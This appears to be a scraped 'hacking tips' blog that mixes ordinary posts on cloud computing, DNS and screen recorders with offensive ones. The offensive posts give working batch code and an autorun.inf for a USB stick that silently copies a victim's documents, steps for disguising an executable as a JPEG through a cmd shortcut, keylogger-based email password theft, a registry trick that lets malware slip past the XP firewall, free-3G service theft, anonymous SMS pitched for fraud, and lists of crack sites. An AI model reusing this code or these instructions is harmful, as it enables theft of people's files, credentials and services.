Pages

How To Send Free SMS Anonymously in India

How To Send Free SMS Anonymously in India

As we all know sending free anonymous text message have become very hard and there are very least sites which provide this facility, if they do so they charge heavy money from their customers. Many people didn't like to pay a penny for this. They just want those site which gives them the opportunity to send free and anonymous message to their friends, relative, many more. So this post is really for them, I hope that they will as well as all the people who read this will also like it.

The main purpose of sending these messages are:

1.To fool/fraud people
2.To gain money from innocent or illiterate people
3.Or it may be as a joke played to you by your friends, relative, or others

How To Send Anonymous Free Messages?

There are very very very least sites which provide the facility to send free messages anonymously. But I have found such a site which provide us to send free message anonymously.

Features of this site:

1.No Registration or Login required.
2.Send Unlimited 160 Characters Sms.
3.Check Message Delivery Report in Real Time.
4.They Don't Include Any Ads Along With Your Sms.
5.Very High Speed Message Delivery System.

Steps to send message:

1.Visit this website: Smsti
2.Write the victim's phone number and message
3.Then click on Send
4.You will be asked to write the words which you will see in a picture, provide them these words correctly
5.Finally Click on 'Agree to Terms'

print your graphical output from C program

To print your graphical output from C program


first download this software name as DOSBOX.
click this link




1: mount c c:/
2: c:
3: cd tc
4: cd bin
5: tc.exe



run your program only by mouse click press printscreen key to print out your output
whether it is text or animation or graphical.
after that open mspaint and press ctrl+v to paste that object.
and then save it....
enjoy friends..

send fake e-mail

Send unlimited fake Email by 100+ subdomain email address

Today,i am going tell you how you send unlimited email by different sub domain name.

Sub domain like...
myself.com
engineer.com
doctor.com
linuxmail.org
contractor.net
usa.com
asia.com
bikerider.com
cash4u.com
cyberservice.com
programmer.net
tech-center.com
solution4u.net
computer4u.com
cyberdude.net
and more than 100+
But remember when you Signup then enter fake country name and do not enter any Contact Email address.
Click Here
If u like it write your view below box.

What is Cloud Computing?

What is Cloud Computing?

What cloud computing really means

Cloud computing comes into focus only when you think about what IT always needs: a way to increase capacity or add capabilities on the fly without investing in new infrastructure, training new personnel, or licensing new software. Cloud computing encompasses any subscription-based or pay-per-use service that, in real time over the Internet, extends IT’s existing capabilities.

Cloud computing is at an early stage, with a motley crew of providers large and small delivering a slew of cloud-based services, from full-blown applications to storage services to spam filtering. Yes, utility-style infrastructure providers are part of the mix, but so are SaaS (software as a service) providers such as Salesforce.com. Today, for the most part, IT must plug into cloud-based services individually, but cloud computing aggregators and integrators are already emerging.

InfoWorld talked to dozens of vendors, analysts, and IT customers to tease out the various components of cloud computing. Based on those discussions, here’s a rough breakdown of what cloud computing is all about:

1. SaaS
This type of cloud computing delivers a single application through the browser to thousands of customers using a multitenant architecture. On the customer side, it means no upfront investment in servers or software licensing; on the provider side, with just one app to maintain, costs are low compared to conventional hosting. Salesforce.com is by far the best-known example among enterprise applications, but SaaS is also common for HR apps and has even worked its way up the food chain to ERP, with players such as Workday. And who could have predicted the sudden rise of SaaS ”desktop” applications, such as Google Apps and Zoho Office?

2. Utility computing
The idea is not new, but this form of cloud computing is getting new life from Amazon.com, Sun, IBM, and others who now offer storage and virtual servers that IT can access on demand. Early enterprise adopters mainly use utility computing for supplemental, non-mission-critical needs, but one day, they may replace parts of the datacenter. Other providers offer solutions that help IT create virtual datacenters from commodity servers, such as 3Tera’s AppLogic and Cohesive Flexible Technologies’ Elastic Server on Demand. Liquid Computing’s LiquidQ offers similar capabilities, enabling IT to stitch together memory, I/O, storage, and computational capacity as a virtualized resource pool available over the network.

3. Web services in the cloud
Closely related to SaaS, Web service providers offer APIs that enable developers to exploit functionality over the Internet, rather than delivering full-blown applications. They range from providers offering discrete business services — such as Strike Iron and Xignite — to the full range of APIs offered by Google Maps, ADP payroll processing, the U.S. Postal Service, Bloomberg, and even conventional credit card processing services.

4. Platform as a service
Another SaaS variation, this form of cloud computing delivers development environments as a service. You build your own applications that run on the provider’s infrastructure and are delivered to your users via the Internet from the provider’s servers. Like Legos, these services are constrained by the vendor’s design and capabilities, so you don’t get complete freedom, but you do get predictability and pre-integration. Prime examples include Salesforce.com’s Force.com,Coghead and the new Google App Engine. For extremely lightweight development, cloud-basedmashup platforms abound, such as Yahoo Pipes or Dapper.net.

5. MSP (managed service providers)
One of the oldest forms of cloud computing, a managed service is basically an application exposed to IT rather than to end-users, such as a virus scanning service for e-mail or an application monitoring service (which Mercury, among others, provides). Managed security services delivered by SecureWorks, IBM, and Verizon fall into this category, as do such cloud-based anti-spam services as Postini, recently acquired by Google. Other offerings include desktop management services, such as those offered by CenterBeam or Everdream.

6. Service commerce platforms
A hybrid of SaaS and MSP, this cloud computing service offers a service hub that users interact with. They’re most common in trading environments, such as expense management systems that allow users to order travel or secretarial services from a common platform that then coordinates the service delivery and pricing within the specifications set by the user. Think of it as an automated service bureau. Well-known examples include Rearden Commerce and Ariba.

7. Internet integration
The integration of cloud-based services is in its early days. OpSource, which mainly concerns itself with serving SaaS providers, recently introduced the OpSource Services Bus, which employs in-the-cloud integration technology from a little startup called Boomi. SaaS provider Workday recently acquired another player in this space, CapeClear, an ESB (enterprise service bus) provider that was edging toward b-to-b integration. Way ahead of its time, Grand Central — which wanted to be a universal “bus in the cloud” to connect SaaS providers and provide integrated solutions to customers — flamed out in 2005.



Differences Between Dedicated Server, Cloud Computing and VPS

Many people still do not know or are confused when speaking of the major differences between Cloud Server Hosting, Virtual Private Servers (VPS) and Dedicated Servers. Starting with the most basic, you know what to serve?

Quite simply, all the three technologies are used to store data, host websites and structures of e- mail, besides running various applications and softwares. So if they serve for the same thing because they are different?

Each has a different characteristic, let us understand :

Dedicated Servers

It is a physical machine, usually allocated on a fully equipped data center and is totally dedicated to one customer who requires high reliability and high performance hardware ( processing, memory , etc.)… If the client needs more resources, you must purchase more hardware and manually install or exchange server. Its main advantage is the high performance and flexibility and its disadvantage is the high price and inability to upgrade / downgrade immediately. This is one of the best flexible solution than shared web hosting, as because the owner gets a total control over the hosting environment and every aspects of the dedicated hosting, which includes the selection of operating system, server hardware, etc… Some web hosting providers may provide the server administration for free, but usually, the client has to manage the server administration and management tasks.

Cloud Server Hosting (Cloud Computing)

Already Cloud Server is a fractionation of a number of resources available to multiple servers and storage arrays. Through an intelligent architecture, you can allocate these resources allows scalability without losing performance. Besides the economy and flexibility, there are numerous advantages to this technology.

Virtual Private Servers (VPS)

It is the fractionation of resources from one physical server, this fractionation being allocated to a single client. VPS is an ideal choice for businesses that requires same flexibility, reliability, security, root access, stability, etc… at much affordable rates that a dedicated server offers. In this technology there is no guarantee of processing and in case of hardware failures, client applications that depend on it will also fail, as there is integration servers like the Cloud.

We simplify the concepts so that everyone can understand, of course there are many other details, but overall this is it!
How Cloud Computing Can Be A Better Way | How is Cloud Computing Different than Traditional Applications?

In order for traditional applications to work properly, they require a data center with power, an office, cooling, servers, networks, bandwidth and storage. Even once you’ve met all those requirements, you need a professional to install them, configure them and make sure they’re running as they should. As much time, effort and money that goes into these programs by large businesses, you can only imagine the headache they pose for small businesses or individuals.

Cloud computing will help you run your business better and more efficiently for many reasons. Unlike many traditional business apps, applications that are cloud based can be up and running in a couple of days. Let’s face it – for your business to be efficient, you can’t have a lot of downtime. Cloud computing will also save you money because you don’t have to pay tons of money in employee wages to run your applications as well as many products to keep them running and updated. Any performance or security enhancements and upgrades your cloud based programs need, they’ll get automatically.

Another way you’ll save with cloud computing is by not having to constantly buy software and servers. They don’t take up as much of your IT resources as traditional applications.


Cloud Computing Market Will Reach $16.7 Billion by 2013

As more and more organizations starting to transition their data into the cloud and tap into web-based applications, the global cloud computing market is continuing to grow at high speed.Analyst firm 451 Market Monitor has predicted that it expects the cloud computing marketplace to reach $16.7 billion in revenue by 2013.

According to its report, the large and well-established software-as-a-service (SaaS (News - Alert)) category, cloud computing will grow from revenue of $8.7bn in 2010 to $16.7bn in 2013, registering a compound annual growth rate (CAGR) of 24 percent.

The research firm believes that the core cloud computing market will grow at much more rapid pace as the cloud increasingly becomes a mainstream IT strategy embraced by corporate enterprises and government agencies.

Excluding SaaS revenue, cloud-delivered platform and infrastructure services will grow from $964m in revenue in 2010 to $3.9bn 2013 - a CAGR of 60% - the report said.

The core market includes platform-as-a-service (PaaS) and infrastructure-as-a-service (IaaS) offerings, as well as the cloud-delivered software used to build and manage a cloud environment, which The 451 Group (News - Alert) calls 'software infrastructure as a service' (SIaaS).

Cloud-based storage will play a starring role in cloud growth, accounting for nearly 40 percent of the core cloud pie in 2010. "We view storage as the most fertile sector, and predict that cloud storage will experience the strongest growth in the cloud platforms segment," the report says.

In June, Gartner said worldwide cloud computing services market is poised for strong growth and its revenue might reach USD 148.8 billion by 2014.

Last month, another market analyst firm Renub Research had predicted that global cloud computing market might cross $25 billion by the end of 2013.

MY IDEAS: I think we can also develop cloud processing units. In which we will have a super computer in a place and the users of it will only need to have a high really high speed internet and a small processor which only need to interact a software ( browser like) that would take the info from the user send it to super computer and present the output info to the user. This idea would be cost-efficient when people will have to buy expensive computers processors and graphic cards but only the would have to buy a 5 dollar processor and every thing will be done by the supercomputer in backend. My ideas about the payments is that a person will pay for the number of MBs that the supercomputer processed

How To Speed Up My Internet Connection with Google Public DNS

How To Speed Up My Internet Connection with Google Public DNS

A guide to getting more out of your internet connection without switching.

If you are looking to increase your internet speed without any expensive software then you came to right place. I will tell you how to increase your internet speed up to 50%-60 % with few clicks. I have applied this trick to my GPRS dial-up connection and my internet connection speed increased to almost double.
Here I will show you how to get fastest speed to load your websites by the using of Google public DNS. Domain Name System (DNS) is a database system that translates a computer’s fully qualified domain name into an IP address. For example, when you type pc-tips-hacks.blogspot.com in web browser then DNS translate pc-tips-hacks.blogspot.com to computer readable number known as IP address and when computer knows about the IP location of web domain name it simply opens website in the browser.


Our ISP (Internet Service Provider) provide their DNS which are located at router. Sometimes DNS server of ISP is very slow then it takes so much time to find out the web address and open the website. To solve this problem you can replace your ISP’s DNS service with Google Public DNS by changing the settings of the network connection.

1) Go to Start -> Control Panel


2) Click on Network Connections in Control Panel


3) Right click on Local Area Connection and then click on Properties


4) Select Internet Protocol (TCP/IP) and then click on properties


5) Select Use the following DNS server addresses in filed Preferred DNS server type 8.8.8.8 and in Alternate DNS server type 8.8.4.4


Hope this tutorial was useful for you.

unlock mobile phones for free

How to Unlock Mobile Phones - Mobile Unlocker

Here i'm posting an utility for unlocking Nokia, Siemens, Samsung, Vitel, Maxel, Panasonic, Motorola, LG, and AEG mobile phones. This utility also includes MasterCode calculator that can reset your Nokia security code if you have lost it.


WorldUnlock Codes Calculator features:
  • Unlock Nokia
  • Unlock LG
  • Unlock Panasonic
  • Unlock Maxon
  • Unlock Samsung
  • Unlock AEG/Telital
  • Unlock Alcatel
  • Unlock Siemens
  • Unlock Sony
  • Unlock Vitel
Easy guide to free Nokia unlocking:

(Please read the whole guide before starting)

Select phone model from list.
  • 2. Enter IMEI number of your phone (Press *#06# on phone)
  • Select country and service provider where the phone was bought.
  • Hit the button: Calculate!
  • The software generate some Nokia unlock codes.
  • If 7 codes are displayed, use the code ending with +7 first.
  • If it does not work, then try +1, and finaly +5.
  • When phone displays "Sim restriction off" it is unlocked.
  • If only two codes are displayed (+1 and +2) enter both of them!

Codes will be shown on the form: #pw+CODE+n#
To get p, w or +, pres the * button several times.

You enter the codes correctly by removing any simcard from the phone, turning the phone on and then enter the code.

Download WorldUnlock Codes Calculator

Top Sites to Find All The Serials You Need

Top Sites to Find All The Serials You Need

Some of The Best Crack/Keygen Sites That Are Safe To Use.

Today there are many people out there who still prefer to use pirated software. It's especially common among users who live outside the U.S. When you download your program or game you might need the serial to remove the trial period. Blindly searching the web for cracks and keygens is about as smart as using Limewire to search for antivirus software – something not well-advised. Undoubtedly and unfortunately, the number of crack sites with overtones of a malicious agenda heavily outweigh sites that just want to serve up the honest goods. Having said that, there actually are quite a few creditable 'crack' sites that won't try to bombard you with full-screen popup ads, or commandeer your computer into a spam-loving Kraken or Srizbi Botnet army. Here i want to present you a list of "clean" crack sites for all the latest warez to unlock your software.

Please note that the site reviews herein only include information about each site, not the contents of the 'cracks' themselves. Always use a reputable antivirus and antispyware program on cracks & keygens before using them.

Here is my list of Safe and Malicious Crack/KeyGen Sites:

www.keygen.in

www.smartserials.com

www.keygenguru.com - Popular site with hundreds of thousands of results.

www.serialkey.net

www.zcrack.com

www.subserials.net

www.serialportal.com

supercracks.net

www.serialcrackz.com

www.serials.be

www.cracktop.com

www.cracksfm.com

www.cracklib.net

www.crackdb.org - The site itself is safe, however; many affiliate links are on the 'do-not-visit' list. When searching, skip past the first results (with the prices).

www.theserials.com

Recover Deleted SMS from SIM or Phone Memory

How to Recover Deleted SMS from SIM or Phone Memory

Recover Deleted SMS Messages From Your Cell Phone for Free

Have you deleted SMS messages that you wish had not gotten deleted? You will be happy to know there are a number of different software that can help you recover the messages you need and want, but not all of them are free and you need to purchase the software. However, if you own a Nokia phone you might be in luck, as there are very good chances of message recovery from your cellphone without need of any specialized data recovery software for free. In this tutorial I will explain, what are the steps to be followed in order to recover deleted SMS from a SIM card or phone memory.

1. First of all download and install FExplorer, excellent file manager and also sends files via bluetooth.


2. Launch FExplorer and navigate to C: if you use Phone Memory to store your messages (default) and D: if you use Storage Card as your SMS storage location.

3. Now navigate to and open "system" folder.

4. Now open the "mail" folder.

5. This folder should contain many folders named similar to 0010001_s etc. with files named similar to 00100000 etc. These files are the actual deleted messages. Simply, use the FExplorer inbuild text viewer to view these files. You will need to browse through every folder and open all files inside them until you get the required SMS.

Thsi tool includes more great fetures like:
  • Cut, copy & paste files
  • Check date modified & size
  • Display free space available
  • View file with inbuilt text viewer
  • Cut, copy, create & paste directories
  • File find. (although this only works within a directory)
  • Take screenshots
  • Set your backlight to be permanently on
  • Send files via bluetooth. (may be necessary to rename .sis to .sis_)
  • Compress memory - increasing available free memory ...and much more.
All of all FExplorer is a handy file explorer application for your Series 60 phone. With a wide range of features, tips and tricks, FExplorer will become one of your favorite mobile applications!

Check for updates of FExplorer here.

increase your download speed by 10 times

Accelerate Downloading Speed up to 10 Times Faster with BitComet

Bitcomet is a p2p file-sharing freeware fully compatible with BitTorrent, designed for the high-speed distribution of 100MB or GB sized files.

BitComet is a useful program to increase your bittorrent downloads. The tool is acting as a network traffic controller between your network card and your BitComet application. The speed increase can be enormous, especially on a slow connection or if you deal with slow sources. The program is free and you don’t need any networking knowledge to use it. It contains many advanced features that can accelerate your downloading up 10 times faster, or even more.

Features:

  • Torrent Share: Exchange torrent while downloading
  • Preview while Downloading: Preview of MP3, rmvb, wmv, and qt is available
  • Align File to Piece Boundary
  • Intelligent Connection Optimization
  • Intelligent Disk Cache
  • Quick Resume
  • Auto Config ICF (Internet Connection Firewall) and ICS (Internet Connection Sharing)
  • Auto Config UPNP port mapping in router (UPnP support is required in router)
  • Option of Disabling and Setting Priority of Files in any torrent
  • Support Multi-tracker, DHT, utf-8 extension, and UDP tracker Protocol v2
CLICK HERE TO DOWNLOAD

Top 5 Free Screen Recorders to Record Your Screen Activities

Top 5 Free Screen Recorders to Record Your Screen Activities

Capture, edit and share any type of video

You probably sometimes spend hours explaining to someone, over the internet how to do something. Instead of typing at people, you can create screen recordings for them and shown them what you´re talking about. Especially if you have your own site and write tutorials, then it´s very useful to create video tutorials. For that you need ascreen recorder.I´ve tested a few free screen recorder and make a list of the best.


1. CamStudio

Cam Studio is easy to use, small size , pretty good screen quality and can record your screen session to .avi files or to .swf . For sure, the best free screen recorder, at least by my opinion.

Download CamStudio

File size: 1.20 MB
Supported: Win All

Here is a video tutorial how to configure the settings and use Camstudio to screen record video tutorials:




2. Wink

Wink offer a lot of options ( add image , audio,textbox…it´s something like windows movie maker that can record screen), but has few limitation; you can record the screen only to .swf, also is complicated to use

Download Wink

File size: 3272 kb
Supported: Win All


3. Jing

Jing is my favourite. Jing is simple application that can capture video and image. Unfortunately, record only to swf. files. Still it's an easy to use software and i recommend you to try it.

Download Jing

File size: 9.1 MB
Windows System Requirements:
  • Windows XP, Vista, or Windows 7
  • Microsoft .NET Framework 3.0
  • Broadband recommended

4. Free Screen Recorder

Free Screen Recorder is another screen recording software that can be used to capture screen activities into a AVI video file. Free screen recorder records every moment including mouse cursor movements, typing etc.

You can also record voice from the microphone which makes it easier to add your own commentary while the video is being recorded.

Download Free Screen Recorder

File size: 591KB
Supported: Win All


5. Freez Screen Recorder

Freez Screen Recorder allows you to record videos and also pause them. Like all the other softwares you can record any region of the screen oractivities in a particular window in addition to recording all the activities of the full screen.

It also supports voice recording from the microphone, videotape or Internet.

Download Freez Screen Recorder

File size: 772KB
Supported: Windows 2003, XP, 2000, 98, Me, NT


* Camtasia Studio (Shareware)

Camtasia Studio is the complete professional solution for recording, editing and sharing high-quality screen video on the Web, CD-ROM and portable media players, including iPod.

Easily record your screen, PowerPoint, multiple audio tracks, and webcam video to create compelling training videos, screencasts, and presentations without ever leaving your desk. With the power of interactive Camtasia Studio videos, you can deliver high-quality content anytime, to even your most remote audience.

Download Camtasia Studio
Download Keygen For Camtasia
This software is shareware (30-day trial), but you can search for a serial number and use it forever for free ;).... Check out this posts: How To Get Cracks and Serials to Any Program using Craagle

10 Easy Ways to Download YouTube Videos To Your Computer

10 Easy Ways to Download YouTube Videos To Your Computer

Download all your favorite videos to your computer. It's never been easier to download youtube videos.

YouTube is the most popular video sharing website where users can upload, view and share video clips. But they don't have the feature to download these videos, so if you want to download some of your favorite videos from Youtube, but don't know how to do it, than check out this post.

Top 10 tools which help you download YouTube Videos.

1. YouTube Downloader - YouTube Downloader is free software that allows you to download videos from YouTube, Google Video, Yahoo Video, and many others and convert them to other video formats. It also allows you to convert downloaded videos for Ipod, Iphone, PSP, Cell Phone, Windows Media, XVid and MP3. Just specify the URL for the video you want to download and click the Ok button.

2. YouTube Catcher is a free service for downloading YouTube videos and saving them to your PC.

3. Kiss YouTube - Kiss YouTube offers the easiest way for downloading video clips from YouTube. To download and save a YouTube video clip, just add the word “kiss” to the video URL in your browser address bar and hit enter. And then click on the download link provided to save the video to your computer.

4. YouTubeLoader Firefox Plugin - Youtubeloader firefox plugin is a Greasemonkey script, which adds a Download link below the YouTube video.

5. KeepVid - Download and save videos directly from Youtube, Google, Metacafe, Putfile and more. Simply copy/paste the link of the video that you're going to download and you're done.

6. VideoDownloader is very similar to KeepVid, but supports even more video sharing sites, and it’s also available as a Firefox extension. Just like with KeepVid, all downloads are in .flv format.

7. save2pc is a free tool that downloads videos from Youtube or Google Video and saves it as Avi or Mpeg. No need to use scripts for web browsers. Just run save2pc and start downloading!

8. VidGrab is another simple site that works with YouTube, Google Video, MySpace and Break.com. Besides the download function, the site also sports a top list of most viewed videos.

9. Xilisoft Download YouTube Video - This YouTube video downloader is an easy to use and flexible application that allows you to drag the YouTube URL directly to the program itself. There are multiple options to make your downloading easy: download directly with Internet Explores right-click menu or with the programs own built-in browser. Moreover, multithread and batch processing assures you the fastest download speeds.

10. KCoolOnline - Currently supports 231 video portals including Youtube. It has a basic interface. All that needs to be done is to paste a video url in the form to download the Youtube video. Users who like to download videos from many different video portals might like this as it supports a lot of them

hack 3g airtel


Airtel Free 3G Hack : Use Free Airtel 3G Internet For Your Computer

Posted by king cobra at Saturday, September 03, 2011
 We have already discussed about Free Airtel GPRS hack on wildhacker, But now many network provider have launched 3G service. So today I am sharing this trick to hack airtel 3G plane on your computer. Actually this trick is shared by one of my postreader. He got 900kbps download speed with airtel 3g using this trick.

So friends this post is for you, by using these trick you can enjoy Airtel 3G service at free of cost on your computer.




Step 1: Connect via AIRTELMMS.COM(MOST IMPORTANT)..
            IF U WANT IT EASY THN GO TO DEVICE MANAGER..SELECT THE MODEM..IN ADVANCE TAB..IN COMMAND SIMPLY PASTE { +CGDCONT=1,"IP","AIRTELMMS.COM" } WITHOUT BRACKETS

Step 2: CREATE A DIALUP CONNECTION....

Step 3: IT WILL CONNECT...AS NO NETWORK ACCESS

Step 4: GO TO CONNECT TO..U WILL SEE CONNECTED...

Step 5: RIGHT CLICK ...LEFT CLICK PROPERTIES

Step 6: GO TO NETWORKING TAB

Step 7: CHECK ALL THE CHECKBOXES

Step 8: CLICK ON INTERNET PROTOCOL VERSION(TCP/IP)

Step 9: CLICK ON PROPERTIES

Step 10: SELECT USE THE FOLLOWING DNS SERVER ADDRESSES

Step 11: ENTER ANY FREE DNS SERVER..I RECOMMEND
              156.154.70.1
              202.138.96.3

Step 12: CLICK OK

Step 13:AGAIN OK

Step 14: A MSG APPEARS " SETTING WILL TAKE PLACE NEXT TYM U DIAL IT" CLICK OK

Step 15: GO TO START> CONNECT TO > DISCONNECT

Step 16: RECONNECT

Step 17: OPEN ANY WEBSITE ...........Enjoy Free Airtel 3G...

Above trick works at any balance with No Balance Deduction...

Credit : rajesh

So friends, I hope this Airtel Free 3G Hack tutorial will be useful for you. If you have any problem in this Airtel Free 3G Hack tutorial, please mention it in comments otherwise mail rajesh at (rrulerofkings@gmail.com ).

Enjoy Airtel 3G hAcKiNg…

hide exe file in jpeg image



1. First Step, Create a new folder and please check that "Show hidden files" is checked and "hide extensions for known file types" is unchecked in folder options.

2. Copy your exe file source in that folder for example called first.exe.

3. Now you have to rename this first.exe file to whatever you want. Here suppose you are renaming it to second.jpeg. When you trying to renaming it windows will warn you like if you really want to change this extension from exe to jpeg, then click on YES.

4. Now create one shortcut of secong.jpeg in same folder and renaming shortcut to whatever you want suppose you are renaming it to third.exe.

5. Now right click on third.exe and go to properties, Here you have to do some changes mentioned below.

6. Delete all things which are present in start in field and leave it empty.

7. Now in this step you have to write the path to open other files second.jpeg like this: C:\WINDOWS\system32\cmd.exe /c second.jpeg

8. The last field, c second.jpeg is always the name of the first file. If you called the first file demo.avi then you you have to write
C:\WINDOWS\system32\cmd.exe /c demo.avi

9. Now here what you are doing is So what you are doing is when someone clicks on third.jpeg, a command will execute the other file second.jpeg and the source will run.

10. Now right click on third.jpeg, go to properties and then you will see one option to change your icon. Click this and then a new window will open. You have to write this : %SystemRoot%\system32\SHELL32.dll and then press OK.

11. All things are done but you have to remember two things in your mind that these 2 files must be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

ask if u have any Question in comment box

autorun virus that steals files with usb


Autorun virus that steals files with a USB

Posted by king cobra at Wednesday, October 13, 2010
What i am going to teach you is how to make an autorun virus that steals files as soon as its plugged into a computer this is not

harmful to the other persons computer at all.

OK so first plug in your usb then navigate your way to it.
Then we are gonna copy and paste this batch code that will steal the files

IF WINDOWS XP USE THIS BATCH

Code

@echo off
:CHECK
if not exist "%&&&&%\Copied_files" md "%&&&&%\Copied_files"
if exist "%systemdrive%\Documents and Settings" goto COPIER
goto ERROR


:COPIER
if not exist "%&&&&%\Copied_files\%computername%" md "%&&&&%\Copied_files\%computername%"
if not exist "%&&&&%\Copied_files\%computername%\VIDEOS" md "%&&&&%\Copied_files\%computername%\VIDEOS"
if not exist "%&&&&%\Copied_files\%computername%\PICTURES" md


"%&&&&%\Copied_files\%computername%\PICTURES"
if not exist "%&&&&%\Copied_files\%computername%\MUSIC" md "%&&&&%\Copied_files\%computername%\MUSIC"
if not exist "%&&&&%\Copied_files\%computername%\DOWNLOADS" md


"%&&&&%\Copied_files\%computername%\DOWNLOADS"
copy /y "%userprofile%\My Documents\*.*" "%&&&&%\Copied_files\%computername%"
copy /y "%userprofile%\My Documents\My Videos" "%&&&&%\Copied_files\%computername%\VIDEOS"
copy /y "%userprofile%\My Documents\My Music" "%&&&&%\Copied_files\%computername%\MUSIC"
copy /y "%userprofile%\My Documents\My Pictures" "%&&&&%\Copied_files\%computername%\PICTURES"
copy /y "%userprofile%\My Documents\Downloads" "%&&&&%\Copied_files\%computername%\DOWNLOADS"
MSG %username% "DONE!"
exit
:ERROR
exit


IF VISTA OR WINDOWS7 USE THIS BATCH

Code :

@echo off
:CHECK
if not exist “%&&&&%\Copied_files” md “%&&&&%\Copied_files”
if exist “%systemdrive%\files” goto COPIER7
goto ERROR
:COPIER7
if not exist “%&&&&%\Copied_files\%computername%” md “%&&&&%\Copied_files\%computername%”
if not exist “%&&&&%\Copied_files\%computername%\VIDEOS” md “%&&&&%\Copied_files\%computername%\VIDEOS”
if not exist “%&&&&%\Copied_files\%computername%\PICTURES” md


“%&&&&%\Copied_files\%computername%\PICTURES”
if not exist “%&&&&%\Copied_files\%computername%\MUSIC” md “%&&&&%\Copied_files\%computername%\MUSIC”
if not exist “%&&&&%\Copied_files\%computername%\DOWNLOADS” md


“%&&&&%\Copied_files\%computername%\DOWNLOADS”
copy /y “%userprofile%\Documents\*.*” “%&&&&%\Copied_files\%computername%”
copy /y “%userprofile%\Videos” “%&&&&%\Copied_files\%computername%\VIDEOS”
copy /y “%userprofile%\Music” “%&&&&%\Copied_files\%computername%\MUSIC”
copy /y “%userprofile%\Pictures” “%&&&&%\Copied_files\%computername%\PICTURES”
copy /y “%userprofile%\Downloads” “%&&&&%\Copied_files\%computername%\DOWNLOADS”
MSG %username% “DONE!”
exit
:ERROR
exit

Now replace &&&& with the name of your usb. For example my usb's name is Firesale.
Then save it as Filestealer.bat or whatever you want.

How this batch file works is that it uses the MD command or the Make Directory command to make the Copied_files folder and the

files inside it. Then it navigates its way to the selecected folders and pastes them there.

Now to make this file autorun when we plug it in we are going to have to make another txt file.
Now open this file and inside paste this

Code:
[autorun]
Open=&&&&.bat
Action=File Copier

So now replace the &&&& with whatever u saved the batch file as.
Now we are gonna save it as autorun.inf

And then take your usb out and plug it back in and the files will be copied.
If there not automatically copied there will be an interface with option like "play with music player" and "read only" scroll down and u will find File copier
If you have any questions please ask!

Any rep is apreciated

how to hack windows administrator password


How to Hack Windows Administrator Password

Posted by king cobra at Saturday, September 11, 2010
This hack will show you how to reset Windows administrator password (for Win 2000, XP, Vista and Win 7) at times when you forget it or when you want to gain access to a computer for which you do not know the password.

Most of us have experienced a situation where in we need to gain access to a computer which is password protected or at times we may forget the administrator password without which it becomes impossible to login to the computer. So here is an excellent hack using which you can reset the password or make the password empty (remove the password) so that you can gain administrator access to the computer. You can do this with a small tool called Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down your computer and boot off your using a floppy disk, CD or USB device (such as pen drive). The tool has the following features.

You do not need to know the old password to set a new one
Will detect and offer to unlock locked or disabled out user accounts!
There is also a registry editor and other registry utilities that works under linux/unix, and can be used for other things than password editing.

How it works?

Most Windows operating systems stores the login passwords and other encrypted passwords in a file called sam (Security Accounts Manager). This file can be usually found in \windows\system32\config. This file is a part of Windows registry and remains inaccessible as long as the OS is active. Hence it is necessary that you need to boot off your computer and access this sam file via boot. This tool intelligently gains access to this file and will reset/remove the password associated with administrator or any other account.

The download link for both CD and floppy drives along with the complete instructions is given below

Offline NT Password & Reg Editor Download

It is recommended that you download the CD version of the tool since floppy drive is outdated and doesn’t exist in today’s computer. Once you download you’ll get a bootable image which you need to burn it onto your CD. Now boot your computer from this CD and follow the screen instructions to reset the password.


Another simple way to reset non-administrator account passwords

Here is another simple way through which you can reset the password of any non-administrator accounts. The only requirement for this is that you need to have administrator privileges. Here is a step-by-step instruction to accomplish this task.

1. Open the command prompt (Start->Run->type cmd->Enter)

2. Now type net user and hit Enter

3. Now the system will show you a list of user accounts on the computer. Say for example you need to reset the password of the account by name John, then do as follows

4. Type net user John * and hit Enter. Now the system will ask you to enter the new password for the account. That’s it. Now you’ve successfully reset the password for John without knowing his old password.

So in this way you can reset the password of any Windows account at times when you forget it so that you need not re-install your OS for any reason. I hope this helps.

how to hack e-mail using hardware keylogger

how to hack e-mail using hardware keylogger

How to Hack an Email using Hardware Keylogger

Posted by rajesh at Saturday, September 11, 2010
http://realhackingtips.blogspot.com/2010/07/best-myspace-facebook-hacking-software.htmlDid you know that keyloggers are the simplest way to hack an email password?. Today I’ll be giving you a detailed information on hardware keyloggers and their use. I will also teach how to hack an email using hardware keylogger.
More information about Keylogger click here

A software keylogger (or simple keylogger) is a stealth computer program that captures every keystroke entered through the keyboard.

Now I’ll tell you what is a hardware keylogger and how it can be used for hacking an email.

Hardware Keyloggers are used for keystroke logging, a method of capturing and recording computer user keystrokes. They plug in between a computer keyboard and a computer and log all keyboard activity to an internal memory. They are designed to work with PS/2 keyboards, and more recently with USB keyboards. A hardware keylogger appears simply as a USB pendrive (thumb drive) or any other computer peripheral so that the victims can never doubt that it is a keylogger. So by looking at it’s appearence it is not possible to identify it as a keylogger. Here are some of the images of hardware keyloggers for your convenience.



So by looking at the above images we can come to know that hardware keyloggers look just like any USB or PS/2 device. So it is very hard to identify it as a keylogger.


Insatalling a Hardware Keylogger to Hack the Email Password

The hardware keylogger must be installed between the keyboard plug and the USB or PS/2 port socket. That is you have to just plug in the keylogger to your keyboard’s plug (PS/2 or USB) and then plug it to the PC socket. The following image shows how the keylogger is installed.



Once you install the hardware keylogger as shown in the above two images the keylogger starts recording each and every keystroke of the keyboard including email passwords and other confidential information. The hardware keylogger has an inbuilt memory in which the logs are stored.

bypassing windows-xp fire wall

Bypassing Windows-XP Firewall

Posted by king cobra at Thursday, September 30, 2010
There is a technique using which we can bypass windows-xp service pack-2 firewall.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.
This is explained here in detail with exploit code.

Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.

Credit :-
The information has been provided by Mark Kica.
The original article can be found at: http://taekwondo-itf.szm.sk/bugg.zipVulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.
If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.
Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
